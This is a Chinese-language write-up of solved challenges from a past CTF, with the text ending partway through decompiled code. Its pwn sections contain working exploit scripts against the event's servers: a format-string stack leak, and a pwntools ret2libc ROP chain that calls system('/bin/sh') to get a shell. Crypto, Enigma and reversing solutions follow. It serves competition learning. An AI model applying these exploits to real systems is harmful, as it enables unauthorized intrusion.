谁元旦还打CTF啊,这两周没有比赛,明天才加班,作个已经过去的比赛。好在已经有官方WP,不会的可以看。
这个没有代码属于瞎pwn,随便输入个东西会提示密码不正确,然后输入%p%p会有地址泄露,说明在格式化字符串漏洞。于是爆破一下看栈里都有啥。
for i in range(200):
p = remote('without-love-it-cannot-be-seen.knping.pl', 30001)
p.sendlineafter(b'> ',f'%{i+1}$p'.encode())
v = p.recvuntil(b' is not', drop=True)
print(i+1, v, end=' ')
if v[:2] == b'0x':
print(p64(int(v,16)))
else:
print('')
p.close()
发现有个可疑值,一般情况下偏移是6,那栈里只有这个0x7866...不清楚是干什么的。
6 b'(nil)'
7 b'0x7866deafdeaf6687' <---- ?????
8 b'0x2073692070243825' b'%8$p is not the correct answer!'
9 b'0x2065687420746f6e'
10 b'0x74636572726f6320'
11 b'0x21726577736e6120'
12 b'(nil)'
13 b'(nil)'
14 b'(nil)'
15 b'(nil)'
16 b'(nil)'
17 b'(nil)'
18 b'(nil)'
19 b'(nil)'
20 b'(nil)'
21 b'(nil)'
22 b'(nil)'
23 b'(nil)'
24 b'0x1'
25 b'0x7fad0ea031ca' <-- libc_start_main_ret libc6_2.36-9+deb12u3_amd64
?输入这个值(转10进制)得到flag
┌──(kali?kali)-[~/ctf/1223]
└─$ nc without-love-it-cannot-be-seen.knping.pl 30001
How deep is your love?
> 8675866579112519303
Exactly!
ping{f0rm47_s7r1ngs_4r3_0bv10us_3v3n_wh3n_y0ur3_8l1nd}
一个有菜单的题,但不是堆。
while ( 1 )
{
v3 = 48;
__isoc99_scanf(" %c", &v3);
switch ( v3 )
{
case '1':
printf("My name is %s, dear\n", a1);
goto LABEL_8;
case '2':
puts(&s);
self_23d6(a1);
return v5 - __readfsqword(0x28u);
case '3':
v1 = get_rand(&unk_51A0);
puts(off_5120[v1 % 5uLL]);
goto LABEL_8;
case '4':
fwrite("Hmph! In that case, choose someone better: ", 1uLL, 0x2BuLL, stdout);
getchar();
fgets(a1, 258, stdin);
v4 = strrchr(a1, 10);
if ( v4 )
*v4 = 0;
goto LABEL_8;
case '5':
return v5 - __readfsqword(0x28u);
default:
LABEL_8:
printf("> ");
break;
}
菜单2会调用自己,这样栈会抬升0x70,而且a1这个值在很低处,计算一下需要436才会把a1包含在栈中,而菜单4会写a1并且长度足够大。
在抬栈的过程中,会有输出带出一些地址,大部分是栈地址,中间有一部分是_IO_2_1_stdin_通过这个输出可以得到libc地址,伏兵在436次后写到return
这里用的libc不是常见的ubuntu的包是libc6_2.36-9+deb12u3_amd64.so 看来是外国常见包。
from pwn import *
libc = ELF('./libc6_2.36-9+deb12u3_amd64.so')
context(arch='amd64', log_level='debug')
#p = process('./dangle')
p = remote('dangle-me.knping.pl', 30000)
for i in range(436):
p.sendline(b'2')
p.sendline(b'4')
msg = p.recvuntil(b'Hmph!')
for i in range(12):
if not b'\x7f' in msg: break
v = msg.index(b'\x7f')
v1 = msg[v-5:v+1]
print(v1)
msg = msg[v+1:]
libc.address = u64(v1.ljust(8, b'\x00')) - libc.sym['_IO_2_1_stdin_']
print(f"{libc.address = :x}")
pop_rdi = next(libc.search(asm('pop rdi;ret')))
bin_sh = next(libc.search(b'/bin/sh\x00'))
system = libc.sym['system']
p.sendlineafter(b"In that case, choose someone better: ", flat(0, pop_rdi+1, pop_rdi+1, pop_rdi+1, pop_rdi, bin_sh, system))
p.sendline(b'5')
p.interactive()
#ping{h0w_t0_r37urn_an_array_fr0m_a_func710n_in_C++?!}
第3题实在看不懂,现在pwn都成rev了,c++写的堆,真复杂
给一了个石碑,碑上有字,弄下来QQ可以识别,搜一下是斐波那契函数的某一项。猜这项号就是flag的ascii码值。
c = [114059301025943970552219,3928413764606871165730,43566776258854844738105,1500520536206896083277,22698374052006863956975682,781774079430987230203437,573147844013817084101, 483162952612010163284885,781774079430987230203437, 70492524767089125814114,3311648143516982017180081, 83621143489848422977,31940434634990099905,927372692193078999176,16641027750620563662096,83621143489848422977,1500520536206896083277,83621143489848422977,59425114757512643212875125]
fib = [1,1]
for i in range(128):
fib.append(sum(fib[-2:]))
m = [fib.index(i)+1 for i in c]
bytes(m)
#ping{testowa_flaga}
给了一堆大小写的xd猜是大小写代表01
b = ''.join(['1' if i in 'XD' else '0' for i in a])
c = ''.join([chr(int(b[i:i+8],2)) for i in range(0, len(b),8)])
转出来是段程序,直接bytes就是flag
#include <stdio.h>
int main() {
int m[] = { 112, 105, 110, 103, 123, 119, 104, 121, 95, 115, 111, 95, 115, 101, 114, 105, 111, 117, 115, 95, 88, 68, 125 };
const int len_m = sizeof((m)) / sizeof((m[0]));
char c[len_m];
for (int i = 0; (i < len_m) & !!(i < len_m); ++i) {
c[i] = (char)(m[i]);
};
for (int j = 0; (j < len_m) & !!(j < len_m); ++j) {
putchar(c[j]);
};
putchar('\\n');
return 0;
};
这题有点绕,有个提示是个卡通人物,外国人都长差不多,跟密码有关的猜是凯撒(因为古典密码就知道这一个)
给的数据包含大于127的值,爆破一下偏移,发现在70,79的位置有可疑值。
#数字符号+79
>>> ''.join([chr((i+79)&0xff) for i in a])
'yrwp{enwr_ermr_erlr_15/03/44_KL}'
#字符+70
>>> ''.join([chr((i+70)&0xff) for i in a])
"pingr\\eniV\\idiV\\iciV(,&'*&++VBCt"
因为凯撒是字母循环移位,所以可能只破坏了内容。不过从这两个看79得到的15/03/44是正确的。后边的ping,BC也是正确的,所以拿到随波上一键一下。
key1 #9: ping{veni_vidi_vici_15/03/44_BC}
给了一堆数,拿给厨子看。
?
给了x,y求a,b
assert x*a + y*b == 0
显然a/b=-y/x直接用连分式求第512项
#-y/x = a/b
x = -x
c = continued_fraction(y/x)
a = c.numerator(512)
b = c.denominator(512)
aes = AES.new(sha256(f'{a}||{b}'.encode()).digest(), AES.MODE_CBC, iv=bytes(16))
aes.decrypt(ct)
b'ping{135str4_135str4_107v4sz_41g0r1thm_r0cks_sc41ing}\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b'
给了p&q和p&(q<<1)来分解
from Crypto.Util.number import getPrime
from Crypto.Util.number import bytes_to_long
p = getPrime(2048)
q = getPrime(2048)
n = p * q
e = 65537
d = pow(e, -1, (p-1)*(q-1))
flag = open("flag.txt","rb").read()
print(f"q & p = {q & p}")
print(f"q & (p << 1) = {q & (p << 1)}")
print(f"n = {n}")
print(f"ct = {pow(bytes_to_long(flag), e, n)}")
爆破一下(虽然搜到用z3的但是复现没成功,还是自己爆破更方便)
sp,sq = ['*']*2048, ['*']*2048
v1 = bin(hint1)[2:].rjust(2048,'0')
v2 = bin(hint2)[2:].rjust(2048,'0')
#hint1 当i位为1时p,q都是1
for i in range(2048):
if v1[i] == '1':
sp[i] = sq[i] = '1'
#hint2 当i位为1时p,q+1(串下一位)为1
for i in range(2047):
if v2[i] == '1':
sp[i] = '1'
sq[i+1] = '1'
#如果hint1为0且q[i]为1则p[i]为0
for i in range(2047):
if v1[i] == '0' and sq[i] == '1':
sp[i] = '0'
if v2[i] == '0' and sp[i] == '1':
sq[i+1] = '0'
queue = [''.join(sp)+''.join(sq)]
while True:
#print(len(queue))
tmp = []
if len(queue)==0:
break
for v in queue:
#修剪
#print(len(v))
v0,v1 = v[:2048],v[2048:]
sv10,sv20 = int(v0.replace('*','0'),2),int(v1.replace('*','0'),2)
sv11,sv21 = int(v0.replace('*','1'),2),int(v1.replace('*','1'),2)
if sv10*sv20 == n:
print(f"p = {sv10}\nq = {sv20}");break
elif sv10*sv20>n:
#print('exit 1', hex(sv10),hex(sv20), sv10*sv20)
continue
if sv11*sv21 == n:
print(f"p = {sv11}\nq = {sv21}");break
elif sv11*sv21<n:
#print('exit 2', hex(sv11),hex(sv21), sv11*sv21)
continue
for i in range(2048):
if v0[i] == '*' or v1[i] == '*':
break
else:
if int(v0,2)*int(v1,2) == n:
print('p = ', int(v0,2))
print('q = ', int(v1,2))
p,q = int(v0,2),int(v1,2)
print(long_to_bytes(pow(ct,inverse(e,(p-1)*(q-1)),n)))
tmp = []
break
continue #queue next
#print("pos:",i)
if v0[i] == '*' and v1[i] == '*':
tmp.append(v0[:i]+'0'+v0[i+1:]+v1[:i]+'0'+v1[i+1:])
tmp.append(v0[:i]+'0'+v0[i+1:]+v1[:i]+'1'+v1[i+1:])
tmp.append(v0[:i]+'1'+v0[i+1:]+v1[:i]+'0'+v1[i+1:])
elif v0[i] == '*':
tmp.append(v0[:i]+'0'+v0[i+1:]+v1)
tmp.append(v0[:i]+'1'+v0[i+1:]+v1)
else:
tmp.append(v0+v1[:i]+'0'+v1[i+1:])
tmp.append(v0+v1[:i]+'1'+v1[i+1:])
queue = tmp
爆破出来,解下RSA
#p = 31414044852860996947346398192704080827872763068694329274119185745613029479035528333554232598283231310566095137226764704917075731383799935776515586265844777813773946852295543402726218641902224785422311606243491480667993899764860043003407319251631200307811139246420848244434497297127317015634454189668717908348206495217498115190364223229458400739908910324859578209742893335839056778035525563166511602128018857154839147727466051233824202845757433679040620809038378983806660286371284178078322695510598701589594072655300137369192244912623132875142160934348472868297941876267796774411586086448879835908911701550744733921087
#q = 20031264712935205421576909728722450859000254939031335947177423899655690963407943703684196824583455780724430510508322444471061102640648385627006448675575550911139961026447682876195769362694106906957742825614700067887842438209095811133022146174646193484025312835425382814981027974302305791824646292068546412405335929744823552696641161835505496009550005563544882690980352348214339664785139718253389610601965973837353663266127169506830895937473045851283979352860361522327409388624637636014786984718193740575250481721203768799684244360057548705869379458130623351549859661059865098634186746444726964522002933623233578518151
long_to_bytes(pow(ct,inverse(e,(p-1)*(q-1)),n))
#ping{RSA_p_and_q_for_the_win!}
Our team intercepted an machine from the enemy, but it suffered damage during transport, causing rotor and plugboard disarray. Your mission is to reconstruct the machine configuration, determine the missing plugboard connection, and decrypt the given ciphertext. Key components:
Rotors: BDFHJLCPRTXVZNYEIWGAKMUSQO, AJDKSIRUXBLHWTMCQGZNPYFVOE, EKMFLGDQVZNTOWYHXUSPAIBRCJ Reflector: EJMZALYXVBWFCRQUONTSPIKHGD Partial plugboard image provided. Ciphertext: dvgs{atrpwb_pxr_mwqlqrxsqggc_crsrv_xiwdtyu_fdp}
从名字上看是恩格玛机,这东西不清楚怎么弄,看WP
虽然给了三个轮,但是爆破并不关心这轮的顺序。接线这一共是10组,相同颜色一组,差一个。
至于Reflector 为什么是A 不大清楚
from python_enigma import enigma
import string
rotor_config = [("III", "A"), ("II", "B"), ("I", "C")]
def to_flag_format(pt):
return f"{pt[0:4]}{{{pt[4:10]}_{pt[10:13]}_{pt[13:25]}_{pt[25:30]}_{pt[30:37]}_{pt[37:40]}}}"
stator_type = ["military","civilian"][0]
for a in string.ascii_uppercase:
for b in string.ascii_uppercase:
for c in string.ascii_uppercase:
for p in "EJPQTUY":
plugs = f"AV BS CG DL F{p} HZ IN KM OW RX" #部分已知
machine = enigma.Enigma(catalog="default", stecker=plugs,
rotors=rotor_config, reflector="Reflector A", operator=True, word_length=100, stator=stator_type)
machine.set_wheels(f"{a}{b}{c}")
ct = "dvgs{atrpwb_pxr_mwqlqrxsqggc_crsrv_xiwdtyu_fdp}"
pt = machine.parse(ct.upper()).lower()
if (pt.startswith('ping')):
print(f"{to_flag_format(pt)} {a} {b} {c} {p}")
'''
Outputs
ping{enigma_ist_uaszinierend_einen_schonev_jag} E C A J
ping{enigma_ist_uahzpnieyend_einen_schonev_cag} E C A Q
ping{enigma_ist_faszinierend_einen_schonen_tag} E C A U
'''
把程序几个字符几个字符的分开写到include文件里,先恢复成代码
name = open('noodleNightmare.cpp').readlines()
msg = ''
for v in name:
v = v.strip()
if v.startswith('#include '):
fname = v[10:-1]
print(fname)
msg += open('./'+fname).read()
if len(v)<2:
msg += v
print(msg)
连起来就是下边这样子,不过不用这个直接写python,g++编译后直接运行就行,但直接按偏移找字符怼上还不对。原因不明。?
using namespace std ;
int main() {
string _ = "Code that overuses }{ GOTO statements ratherzx than_structured programminjg constructqs, resulting in convoluted and unmaintainable programs, is often called spaghetti code. Such code has a complex and tangled control structure, resulting in a program flow that is conceptually like a bowl of spaghetti, twisted and tangled.";
cout << "People always say that my code is spaghetti, but I don't see it. Can you help me find the flag?" << endl ;
string ____ ;
cin >> ____ ;
string __ = "";
for ( int ______ = 0 ;______ < 55 ;++______) { __ += "a"; }
__[ 0 ] = _[ 63 ] ;__[ 1 ] = _[ 71 ] ;__[ 2 ] = _[ 34 ] ;__[ 3 ] = _[ 66 ] ;__[ 4 ] = _[ 20 ] ;__[ 5 ] = _[ 71 ] ;
__[ 6 ] = _[ 5 ] ;__[ 7 ] = _[ 51 ] ;__[ 8 ] = _[ 71 ] ;__[ 9 ] = _[ 15 ] ;__[ 10 ] = _[ 51 ] ;__[ 11 ] = _[ 128 ] ;__[ 12 ] = _[ 7 ] ;
__[ 13 ] = _[ 2 ] ;__[ 14 ] = _[ 51 ] ;__[ 15 ] = _[ 255 ] ;__[ 16 ] = _[ 6 ] ;__[ 17 ] = _[ 3 ] ;__[ 18 ] = _[ 34 ] ;__[ 19 ] = _[ 51 ] ;
__[ 20 ] = _[ 56 ] ;__[ 21 ] = _[ 1 ] ;__[ 22 ] = _[ 2 ] ;__[ 23 ] = _[ 3 ] ;__[ 24 ] = _[ 51 ] ;__[ 25 ] = _[ 71 ] ;__[ 26 ] = _[ 15 ] ;
__[ 27 ] = _[ 51 ] ;__[ 28 ] = _[ 3 ] ;__[ 29 ] = _[ 7 ] ;__[ 30 ] = _[ 15 ] ;__[ 31 ] = _[ 71 ] ;__[ 32 ] = _[ 3 ] ;__[ 33 ] = _[ 13 ] ;
__[ 34 ] = _[ 51 ] ;__[ 35 ] = _[ 5 ] ;__[ 36 ] = _[ 1 ] ;__[ 37 ] = _[ 51 ] ;__[ 38 ] = _[ 13 ] ;__[ 39 ] = _[ 3 ] ;__[ 40 ] = _[ 7 ] ;
__[ 41 ] = _[ 2 ] ;__[ 42 ] = _[ 51 ] ;__[ 43 ] = _[ 71 ] ;__[ 44 ] = _[ 34 ] ;__[ 45 ] = _[ 51 ] ;__[ 46 ] = _[ 7 ] ;__[ 47 ] = _[ 15 ] ;
__[ 48 ] = _[ 15 ] ;__[ 49 ] = _[ 3 ] ;__[ 50 ] = _[ 32 ] ;__[ 51 ] = _[ 128 ] ;__[ 52 ] = _[ 93 ] ;__[ 53 ] = _[ 276 ] ;__[ 54 ] = _[ 19 ]
if ( ____ == __ ) { cout << "Congratulations, you have untangled this spaghetti!" << endl ;}
else { cout << "Not this time!" << endl ;}
}
这个打开就看到了,复制下来处理一下。
a = '''case 0
case 0x20
if ( v42 != 'p' )
case 1
if ( v42 != 'i' )
case 2
if ( v42 != 'n' )
case 3
if ( v42 != 'g' )
case 4
if ( v42 != '{' )
case 5
if ( v42 != 'z' )
case 6
case 9
if ( v42 != '1' )
case 7
if ( v42 != 'G' )
case 8
case 0xB
case 0x10
case 0x15
if ( v42 != '_' )
case 0xA
if ( v42 != 'S' )
case 0xC
if ( v42 != 'v' )
case 0xD
case 0x17
if ( v42 != '3' )
case 0xE
if ( v42 != 'R' )
case 0xF
if ( v42 != 'Y' )
case 0x11
if ( v42 != 'C' )
case 0x12
if ( v42 != '0' )
case 0x13
case 0x1E
if ( v42 != 'O' )
case 0x14
case 0x21
if ( v42 != 'l' )
case 0x16
case 0x1F
if ( v42 != '2' )
case 0x18
if ( v42 != '4' )
case 0x19
if ( v42 == 'm' )
case 0x1A
case 0x1C
if ( v42 != 'K' )
case 0x1B
case 0x1D
if ( v42 != 'I' )
case 0x22
if ( v42 == '}' )
'''
m = ['x']*0x23
p = []
for i in a.split('\n'):
if i[:5] == 'case ':
p.append(int(i[5:],16))
elif i[:5] == ' if ':
for j in p:
m[j] = i.split("'")[1]
p = []
print(''.join(m))
#ping{z1G_1S_v3RY_C0Ol_234mKIKIO2pl}
里边代码巨简单,就是有点长,复制出来稍加处理
dword_4052C0 = 0
dword_4052C4 = 1
dword_4052C8 = 2
dword_4052CC = 3
dword_4052D0 = 4
v10 = dword_4052C8 | dword_4052C4
v6 = dword_4052C8 | dword_4052CC
v7 = dword_4052D0 | dword_4052CC
v22 = b"ding{ring_ding_ding_daa_baa_baaaa}"
v19 = [0]*34
v19[0] = (v7 | dword_4052C4 ^ (dword_4052D0 | dword_4052C4 & ~(dword_4052C8 ^ dword_4052C4 & ~((dword_4052C8 ^ (dword_4052D0 | dword_4052C4 & ((dword_4052C8 ^ ((dword_4052D0 | ((v6 | ~(dword_4052CC & (v10 | dword_4052D0 ^ ((dword_4052C4 | v22[0]) >> dword_4052CC)))) << dword_4052D0)) << dword_4052C4)) << dword_4052C8))) >> dword_4052C8)))) << dword_4052D0
v11 = dword_4052D0 ^ dword_4052C4
v8 = dword_4052D0 | dword_4052C4
v19[1] = (dword_4052C4 ^ ((dword_4052D0 | (((dword_4052CC & ~(~(v7 | ((v8 | ~((dword_4052C4 | ((dword_4052C4 & ~((dword_4052C4 & ((v8 | dword_4052C8 ^ (dword_4052C8 | v11 ^ dword_4052CC & ~v22[1]) & dword_4052D0 & dword_4052CC) >> dword_4052D0 << dword_4052C8)) >> dword_4052C4)) >> dword_4052C4)) << dword_4052CC)) >> dword_4052D0)) << dword_4052CC >> dword_4052CC >> dword_4052CC << dword_4052CC)) << dword_4052CC << dword_4052C8) >> dword_4052C4)) << dword_4052C4))
v13 = dword_4052C8 ^ dword_4052CC
v15 = dword_4052C8 & dword_4052CC
v19[2] = (dword_4052D0 | dword_4052C8 ^ (~(v11 ^ (~(dword_4052D0 | ((dword_4052CC | ((dword_4052C8 ^ dword_4052D0 & ~((dword_4052C8 | dword_4052C4 ^ ((dword_4052CC ^ (dword_4052D0 | ((dword_4052D0 ^ v15 & ((v13 ^ (v22[2] >> dword_4052C4)) >> dword_4052C4)) << dword_4052C8))) >> dword_4052C8)) << dword_4052C4 << dword_4052C4)) << dword_4052C8)) << dword_4052CC)) << dword_4052CC << dword_4052C8)) >> dword_4052C8)) >> dword_4052D0
v19[3] = ~((dword_4052C4 | (~(dword_4052CC << dword_4052CC << dword_4052C8) >> dword_4052CC)) << dword_4052CC)
v16 = dword_4052D0 & dword_4052C4
v19[4] = ~(dword_4052D0 ^ ~dword_4052CC & (~(dword_4052C4 & ((v16 & ((dword_4052CC | ((dword_4052C8 | ~(dword_4052CC | ((dword_4052C8 ^ ((dword_4052D0 | dword_4052C4 & ((dword_4052D0 ^ (~(v6 | dword_4052D0 & ~v22[4]) >> dword_4052CC)) << dword_4052C4 << dword_4052C4)) >> dword_4052CC)) >> dword_4052D0))) << dword_4052C4)) >> dword_4052C8)) >> dword_4052C4)) << dword_4052C8 << dword_4052C4 << dword_4052D0))
v19[5] = (dword_4052C8 ^ ((v7 | dword_4052D0 ^ (v6 >> dword_4052D0 >> dword_4052C8)) << dword_4052D0))
v18 = dword_4052C8 & dword_4052C4
v19[6] = ~((dword_4052CC | dword_4052C4 | (~(((dword_4052C8 | ((~(dword_4052CC | (~(dword_4052D0 ^ ((dword_4052C8 | dword_4052C4 & ((dword_4052C8 | ((v18 & ~(dword_4052C8 & dword_4052CC & dword_4052C4)) << dword_4052C4 << dword_4052C8)) << dword_4052CC << dword_4052D0 >> dword_4052C4 >> dword_4052C4)) << dword_4052D0 << dword_4052C4)) >> dword_4052D0 >> dword_4052C4)) << dword_4052C4) >> dword_4052C8 >> dword_4052C4)) << dword_4052C4) >> dword_4052D0) << dword_4052D0)) << dword_4052C4 << dword_4052C4)
v19[7] = (v13 ^ (~(~(dword_4052C8 ^ dword_4052D0 & ~(((dword_4052D0 | dword_4052C8 ^ dword_4052C4 & (((~(dword_4052D0 ^ ((dword_4052CC ^ ((dword_4052C4 | ~(dword_4052CC & (dword_4052C4 | ~(dword_4052CC ^ (v22[7] >> dword_4052CC))))) << dword_4052C4)) >> dword_4052D0)) >> dword_4052C4 << dword_4052D0) & dword_4052CC & dword_4052C4) >> dword_4052C8)) << dword_4052C4) >> dword_4052CC)) << dword_4052C8) << dword_4052C8))
v12 = dword_4052C8 ^ dword_4052C4
v19[8] = (dword_4052CC | ((dword_4052C4 ^ ((dword_4052CC ^ (dword_4052C8 | ((dword_4052C4 & (v13 ^ (dword_4052C4 | (~(dword_4052C8 ^ ((dword_4052D0 ^ (~(v12 >> dword_4052CC) << dword_4052D0)) << dword_4052C8)) >> dword_4052CC)))) >> dword_4052D0))) << dword_4052C4)) << dword_4052D0))
v19[9] = ~((dword_4052C8 | ((dword_4052D0 | (~(dword_4052D0 ^ (v7 | dword_4052C8 & (~(dword_4052C8 | ((dword_4052D0 & (dword_4052C4 ^ (dword_4052D0 | ((dword_4052C4 & ((dword_4052C8 ^ dword_4052D0 & ((dword_4052D0 ^ ((dword_4052CC & (dword_4052C4 | ~(dword_4052CC | v22[9]))) >> dword_4052CC)) << dword_4052D0)) << dword_4052C4)) << dword_4052C4)))) >> dword_4052D0)) >> dword_4052C4 << dword_4052CC))) << dword_4052CC)) << dword_4052C8)) << dword_4052C4) >> dword_4052C4
v17 = ~dword_4052D0
v19[10] = (dword_4052C8 | ((dword_4052D0 | (((dword_4052C8 & ~(dword_4052D0 | dword_4052C8 & (dword_4052C4 | ((dword_4052D0 & (dword_4052CC | ~(v10 | ((dword_4052CC | (((dword_4052CC | (~dword_4052CC >> dword_4052CC)) & dword_4052C8 & v17) << dword_4052C4)) >> dword_4052C8)))) >> dword_4052D0 >> dword_4052D0)))) << dword_4052D0) >> dword_4052D0)) << dword_4052D0))
v19[11] = (dword_4052CC ^ ((dword_4052CC ^ ((dword_4052CC ^ ((dword_4052CC & ((dword_4052C8 | ((dword_4052C4 ^ (((dword_4052C8 ^ ((dword_4052C8 & ((dword_4052D0 & ((dword_4052CC & ~((dword_4052C4 ^ dword_4052D0 & ~v22[11]) >> dword_4052D0)) << dword_4052D0)) >> dword_4052D0)) >> dword_4052C4 >> dword_4052C8 << dword_4052D0)) << dword_4052CC) >> dword_4052C4)) << dword_4052C4)) >> dword_4052C4)) >> dword_4052C8 << dword_4052C8)) << dword_4052D0)) >> dword_4052D0 << dword_4052D0))
v19[12] = (dword_4052C8 ^ ((dword_4052CC ^ ((dword_4052C8 | ~((dword_4052CC ^ (dword_4052C4 | ((~(dword_4052C8 ^ (dword_4052C4 | dword_4052CC & (~(dword_4052C4 & (dword_4052CC ^ (dword_4052C8 | ~(dword_4052CC ^ ((dword_4052C4 & ((v18 & (dword_4052C8 | (v22[12] << dword_4052C8))) << dword_4052C4)) >> dword_4052C4))))) >> dword_4052C4 << dword_4052C4))) << dword_4052CC) >> dword_4052C8))) >> dword_4052C4)) << dword_4052C4)) << dword_4052D0))
v19[13] = ~((dword_4052D0 | ~(v13 ^ (dword_4052C4 | dword_4052C8 & ~(dword_4052D0 ^ (dword_4052D0 >> dword_4052CC) & dword_4052C8 & dword_4052D0)))) << dword_4052C8 << dword_4052D0 >> dword_4052C4)
v19[14] = (dword_4052D0 ^ dword_4052CC ^ ((dword_4052C4 | ((dword_4052C8 ^ dword_4052D0 & ~dword_4052CC) << dword_4052C8 >> dword_4052CC)) << dword_4052D0))
v19[15] = ~(~(dword_4052C8 ^ (~((dword_4052CC | (((dword_4052D0 ^ ((~(dword_4052C4 & ((dword_4052C4 | (v22[15] >> dword_4052D0)) >> dword_4052C8)) << dword_4052C4) >> dword_4052C4 >> dword_4052CC)) << dword_4052C4 << dword_4052C4 << dword_4052D0) >> dword_4052C8 << dword_4052D0 >> dword_4052D0)) << dword_4052C8 << dword_4052C4) >> dword_4052CC >> dword_4052C4 >> dword_4052D0 << dword_4052D0 >> dword_4052CC)) << dword_4052CC) >> dword_4052CC << dword_4052CC
v19[16] = ~(~(dword_4052CC ^ (dword_4052C8 | ((dword_4052C8 & ~((dword_4052C8 ^ (dword_4052C8 >> dword_4052CC)) << dword_4052C8)) << dword_4052C4))) << dword_4052D0)
v19[17] = (dword_4052C4 | ((dword_4052CC | ((dword_4052D0 ^ (dword_4052CC | dword_4052C4 & ((dword_4052D0 ^ ((dword_4052C4 & (dword_4052CC ^ dword_4052D0 & ~(dword_4052CC | ((dword_4052C8 | dword_4052C4 ^ (~(dword_4052CC & (v12 ^ v22[17])) << dword_4052CC)) << dword_4052D0)))) << dword_4052CC >> dword_4052C8)) << dword_4052CC))) >> dword_4052D0)) << dword_4052C8)) << dword_4052CC
v19[18] = (dword_4052C4 ^ ((dword_4052C4 ^ dword_4052CC & (dword_4052C8 | ((dword_4052CC & ~dword_4052C8) << dword_4052D0))) << dword_4052D0))
v19[19] = (dword_4052D0 ^ ((dword_4052D0 | dword_4052CC ^ dword_4052C4) << dword_4052D0))
v19[20] = (dword_4052CC ^ ((dword_4052D0 | dword_4052C8 & ~(dword_4052C4 & ((dword_4052CC | dword_4052D0 ^ (v10 | ~(dword_4052C8 & ((dword_4052CC | dword_4052C4 ^ ((dword_4052D0 & (~(v10 | (~(dword_4052D0 & (v11 ^ (dword_4052C4 | dword_4052C8 ^ ((dword_4052D0 & (v22[20] >> dword_4052CC)) << dword_4052C8)))) << dword_4052CC)) << dword_4052D0)) >> dword_4052C8)) << dword_4052C4 << dword_4052C8)))) << dword_4052CC))) << dword_4052CC))
v19[21] = (dword_4052D0 | ~((dword_4052C8 ^ (~((dword_4052D0 | ~((dword_4052C8 | ~(dword_4052D0 ^ dword_4052C4 & ((dword_4052D0 | v12 ^ v17) >> dword_4052CC))) << dword_4052CC)) << dword_4052CC) >> dword_4052CC << dword_4052C4 << dword_4052CC)) >> dword_4052D0 << dword_4052D0)) >> dword_4052CC
v19[22] = (dword_4052D0 | dword_4052C4 ^ ((dword_4052CC | ((dword_4052C8 ^ dword_4052C4 & ~(dword_4052C8 | ((v8 | (~(v12 ^ (((dword_4052C8 & ((dword_4052C4 & ~(dword_4052C8 | dword_4052C4 ^ (dword_4052C8 | ((~dword_4052C8 & (dword_4052C4 ^ ((dword_4052D0 & (~(dword_4052D0 >> dword_4052C8) << dword_4052CC)) >> dword_4052C4))) >> dword_4052CC >> dword_4052CC)))) >> dword_4052C4)) << dword_4052D0) >> dword_4052D0)) << dword_4052CC >> dword_4052CC)) >> dword_4052C4))) << dword_4052C4)) << dword_4052D0))
v9 = dword_4052C4 & (v13 ^ v15 & ~(dword_4052C8 | ((dword_4052CC ^ (((v8 | dword_4052CC & (~((dword_4052C4 & (dword_4052CC ^ (dword_4052D0 | ((dword_4052C4 & (dword_4052CC | ((dword_4052CC & (v12 ^ ((dword_4052C4 ^ (~v22[23] >> dword_4052C4 << dword_4052C8)) >> dword_4052C8))) >> dword_4052D0))) >> dword_4052CC)))) >> dword_4052CC) << dword_4052CC << dword_4052C4)) << dword_4052CC) >> dword_4052C8)) >> dword_4052C8)))
v14 = dword_4052C8 | dword_4052D0
v19[23] = (dword_4052C8 ^ ((v14 | v9) << dword_4052D0))
v19[24] = ~(dword_4052C4 | ((dword_4052C8 | ((dword_4052C4 | ~(dword_4052C8 ^ dword_4052D0 ^ (dword_4052C4 | dword_4052D0 ^ dword_4052CC & (dword_4052C4 ^ (dword_4052CC | ((dword_4052C4 & (v6 | ((dword_4052CC & ((dword_4052C4 & ((dword_4052CC | (~(~(dword_4052C8 ^ dword_4052D0 ^ ((dword_4052D0 ^ (dword_4052C8 | v22[24])) >> dword_4052CC >> dword_4052D0)) << dword_4052C8) << dword_4052C4)) << dword_4052C4 << dword_4052C8)) << dword_4052C4 << dword_4052D0)) >> dword_4052D0 >> dword_4052CC))) << dword_4052C4 << dword_4052C8)))))) << dword_4052CC)) << dword_4052CC << dword_4052C8)) << dword_4052C8 >> dword_4052CC
v19[25] = ~(v12 ^ ((dword_4052C4 | dword_4052C8 ^ (~(dword_4052CC & (dword_4052C4 | ((dword_4052CC | ((dword_4052C8 & ((dword_4052D0 ^ dword_4052C4 & ~((dword_4052C4 ^ (dword_4052D0 | dword_4052C8 ^ ((dword_4052C4 ^ (dword_4052D0 | dword_4052C4 & (dword_4052D0 ^ dword_4052CC & ((dword_4052C4 & (~v22[25] >> dword_4052CC >> dword_4052D0)) >> dword_4052C8)))) << dword_4052C8))) << dword_4052C4 << dword_4052C8)) << dword_4052CC << dword_4052D0 << dword_4052CC)) >> dword_4052C8)) >> dword_4052C8 << dword_4052CC))) << dword_4052CC)) << dword_4052C4 << dword_4052C8))
v19[26] = (dword_4052CC | ((dword_4052CC | dword_4052C4 & ~(dword_4052C8 ^ (v10 << dword_4052C4))) << dword_4052D0))
v19[27] = (dword_4052C8 | ((dword_4052CC | ((dword_4052C4 & ~((dword_4052C8 | ~((dword_4052CC & (~(dword_4052C8 ^ ((dword_4052C4 & ~(dword_4052C8 ^ dword_4052C4 & ((dword_4052C4 | ~(dword_4052CC ^ ((dword_4052CC | ~(dword_4052C4 ^ v16 & ((~dword_4052C8 | v22[27]) >> dword_4052D0))) >> dword_4052CC << dword_4052D0))) << dword_4052C8))) << dword_4052D0 << dword_4052CC)) >> dword_4052C8 >> dword_4052C4)) << dword_4052CC)) >> dword_4052CC)) >> dword_4052D0)) << dword_4052C4 << dword_4052C4 << dword_4052C4 << dword_4052C8))
v19[28] = (v17 & (dword_4052C8 | (~(dword_4052C8 | (~(dword_4052C4 ^ ((v7 | ((dword_4052D0 & (dword_4052C4 ^ (((dword_4052C4 ^ (((dword_4052C4 & (v22[28] << dword_4052C4 >> dword_4052C8)) << dword_4052CC) >> dword_4052C8 << dword_4052C8)) << dword_4052CC << dword_4052C4 << dword_4052C8) >> dword_4052C8))) >> dword_4052D0)) >> dword_4052D0 << dword_4052C4)) << dword_4052D0)) << dword_4052CC))) >> dword_4052C4
